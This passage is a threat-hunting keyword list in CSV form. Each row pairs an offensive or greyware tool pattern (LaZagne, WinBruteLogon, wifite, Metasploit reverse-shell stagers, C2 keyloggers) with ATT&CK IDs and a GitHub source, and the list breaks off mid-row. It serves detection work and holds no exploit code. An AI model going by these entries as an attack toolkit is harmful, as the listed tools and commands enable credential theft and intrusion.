-*Whirlpool-Tweak-512.verified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Whisker.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*whiskeysaml.py*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*whiskeysamlandfriends*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*whoami /priv | findstr /i /C:*SeImpersonatePrivilege*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*whoami /user*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,0,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*whoami*,greyware_tool_keyword,whoami,whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's 
privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. or targeted attacks within the compromised network.,T1003.001 - T1087 - T1057 ,TA0006 - TA0007,N/A,N/A,Information Gathering,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*whoami.exe* /groups*,greyware_tool_keyword,whoami,whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. or targeted attacks within the compromised network.,T1003.001 - T1087 - T1057 ,TA0006 - TA0007,N/A,N/A,Information Gathering,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*whoami.nim*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*whoami.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*WhoamiGetTokenInfo*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*wifi/airpwn*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*wifi/dnspwn*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*wifi_dump_linux*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*wifi_fake_auth.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*WiFi_Hacker.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*wifi_pineapple_csrf*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*wifi_recon_handshakes*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*wifi-arsenal*,offensive_tool_keyword,wifi-arsenal,github repo with all the wireless exploitation tools available,N/A,N/A,N/A,N/A,Network Exploitation tools,https://github.com/0x90/wifi-arsenal,1,1,N/A,N/A,10,1690,401,2020-07-06T00:46:06Z,2015-03-22T18:38:03Z -*wifibroot.py*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,1,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*wifi-bruteforcer*,offensive_tool_keyword,wifi-bruteforcer-fsecurify,Android application to brute force WiFi passwords without requiring a rooted device.,T1110 - T1555 - T1051 - T1081,TA0002 - TA0008 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/faizann24/wifi-bruteforcer-fsecurify,1,1,N/A,N/A,10,1094,328,2022-04-16T02:59:36Z,2017-01-02T17:54:33Z -*wifi-bruteforcer*,offensive_tool_keyword,wifi-bruteforcer-fsecurity,Wifi bruteforcer,T1110 - T1114 - T1601 - T1602 - T1603,TA0003 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/faizann24/wifi-bruteforcer-fsecurify,1,1,N/A,N/A,10,1094,328,2022-04-16T02:59:36Z,2017-01-02T17:54:33Z -*wifidump.cna*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*wifijammer*,offensive_tool_keyword,wifijammer,wifijammer,T1497 - T1498 - T1531,TA0001 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/DanMcInerney/wifijammer,1,1,N/A,N/A,10,3750,797,2023-07-04T01:43:51Z,2014-01-26T07:54:39Z -*wifiphisher*,offensive_tool_keyword,wifiphisher,The Rogue Access Point Framework.,T1553.003 - T1562 - T1539,TA0002 - TA0007 - ,N/A,N/A,Frameworks,https://github.com/wifiphisher/wifiphisher,1,1,N/A,N/A,10,12107,2517,2023-09-26T19:58:05Z,2014-09-26T12:47:28Z -*WiFi-Pumpkin*,offensive_tool_keyword,WiFi-Pumpkin,Framework for Rogue Wi-Fi Access Point Attack.,T1562 - T1530 - T1552 - T1553 - T1561,TA0005 - TA0006 - TA0009,N/A,N/A,Sniffing & Spoofing,https://github.com/P0cL4bs/WiFi-Pumpkin,1,1,N/A,N/A,10,3059,750,2020-04-18T19:32:52Z,2015-06-27T00:56:21Z -*wifite --crack*,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,0,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z -*wifite --dict *.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*wifite -e *,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. 
and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,0,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z -*wifite --kill*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*wifite --wep *,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,0,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z -*Wifite.py*,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,1,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z -*wifite2.git*,offensive_tool_keyword,wifite2,This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. 
and Wifite will automatically start trying to capture or crack the password.,T1590 - T1170 - T1595,TA0002 - TA0003 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/derv82/wifite2,1,1,N/A,N/A,10,5332,1188,2023-09-21T16:40:07Z,2015-05-30T06:09:52Z -*win_chrome_password_extractor.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*win_fake_malware.*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*win_keylogger.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*win_rev_http.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*win_rev_https.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z 
-*win_rev_tcp.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*win_wlan_passwd_and_wanip_extractor.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*Win32.LaZagne*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*Win32.Trojan*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Win32/Goodkit*,signature_keyword,Antivirus Signature,antivirus signatures,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Win32/IceId*,signature_keyword,Antivirus Signature,antivirus signatures,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Win32/Mikatz*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,mimikatz signatures,10,10,N/A,N/A,N/A,N/A -*Win32/Trickbot*,signature_keyword,Antivirus Signature,antivirus signatures,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A 
-*Win32/UACBypass*,signature_keyword,Antivirus Signature,windows defender antivirus signature for UAC bypass,N/A,N/A,N/A,N/A,Defense Evasion,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Win32:Trojan*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*win32_stage_boot_reverse_shell_revert.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*win32_stage_uploadexec.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*win32_stage_winexec.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Win32kLeaker.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Win64.Lazagne*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*Win64/IceId*,signature_keyword,Antivirus Signature,antivirus signatures,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Win64/Mikatz*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,mimikatz signatures,10,10,N/A,N/A,N/A,N/A -*Win7Elevate.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Win7ElevateDll.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*WinBruteLogon* -v -u*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,0,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*WinBruteLogon.dpr*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*WinBruteLogon.dproj*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*WinBruteLogon.exe*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*WinBruteLogon.res*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*WinCreds.exe*,offensive_tool_keyword,WinPwn,Automation for internal Windows 
Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*windapsearch --dc *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*windapsearch.py*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/ropnop/windapsearch,1,1,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z -*windapsearch_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*windapsearch_py2.py*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - 